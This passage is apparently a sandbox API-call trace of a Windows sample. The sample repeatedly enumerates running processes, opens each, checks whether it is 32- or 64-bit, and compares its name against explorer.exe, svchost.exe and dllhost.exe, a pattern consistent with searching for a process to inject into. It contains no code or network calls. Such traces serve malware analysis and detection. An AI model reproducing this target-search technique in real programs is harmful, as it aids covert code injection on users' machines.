CloseHandle (hObject=0xec) returned 1 [0224.873] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0224.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0224.874] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.874] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.874] CloseHandle (hObject=0xec) returned 1 [0224.874] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0224.874] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0224.874] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0224.874] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0224.875] CloseHandle (hObject=0xe8) returned 1 [0224.875] Sleep (dwMilliseconds=0x3e8) [0225.881] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0225.883] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0225.884] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0225.885] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0225.885] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0225.886] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0225.886] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0225.887] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0225.888] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0225.888] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0225.889] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0225.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0225.890] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0225.890] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0225.891] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0225.891] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0225.892] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0225.893] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0225.893] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0225.894] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0225.895] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0225.895] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.895] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.895] CloseHandle (hObject=0xec) returned 1 [0225.895] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0225.896] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0225.897] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.897] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.897] CloseHandle (hObject=0xec) returned 1 [0225.897] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0225.897] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0225.898] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0225.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0225.899] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.899] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.899] CloseHandle (hObject=0xec) returned 1 [0225.899] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0225.899] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0225.899] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0225.899] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0225.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0225.900] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.900] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.900] CloseHandle (hObject=0xec) returned 1 [0225.900] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0225.900] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0225.900] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0225.900] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0225.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0225.900] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.900] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.901] CloseHandle (hObject=0xec) returned 1 [0225.901] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0225.901] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0225.901] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0225.901] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0225.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0225.901] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.901] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.901] CloseHandle (hObject=0xec) returned 1 [0225.901] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0225.901] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0225.901] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0225.902] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0225.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0225.902] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.902] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.902] CloseHandle (hObject=0xec) returned 1 [0225.902] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0225.902] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0225.902] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0225.902] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0225.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0225.903] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.903] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.903] CloseHandle (hObject=0xec) returned 1 [0225.903] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0225.903] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0225.903] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0225.903] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0225.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0225.904] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.904] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.904] CloseHandle (hObject=0xec) returned 1 [0225.904] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0225.904] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0225.904] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0225.904] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0225.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0225.905] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.905] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.905] CloseHandle (hObject=0xec) returned 1 [0225.905] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0225.905] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0225.905] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0225.905] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0225.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0225.906] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.906] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.906] CloseHandle (hObject=0xec) returned 1 [0225.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0225.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0225.906] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0225.906] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0225.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0225.906] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.906] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.906] CloseHandle (hObject=0xec) returned 1 [0225.907] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0225.907] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0225.907] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0225.907] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0225.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0225.907] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.907] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.907] CloseHandle (hObject=0xec) returned 1 [0225.907] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0225.907] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0225.908] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0225.908] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0225.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0225.908] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.908] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.908] CloseHandle (hObject=0xec) returned 1 [0225.908] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0225.908] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0225.908] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0225.908] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0225.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0225.909] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.909] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.909] CloseHandle (hObject=0xec) returned 1 [0225.909] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0225.909] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0225.909] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0225.909] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0225.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0225.910] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.910] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.910] CloseHandle (hObject=0xec) returned 1 [0225.910] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0225.910] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0225.910] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0225.910] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0225.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0225.911] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.911] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.911] CloseHandle (hObject=0xec) returned 1 [0225.911] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0225.911] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0225.911] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0225.911] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0225.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0225.912] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.912] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.912] CloseHandle (hObject=0xec) returned 1 [0225.912] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0225.912] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0225.912] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0225.912] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, 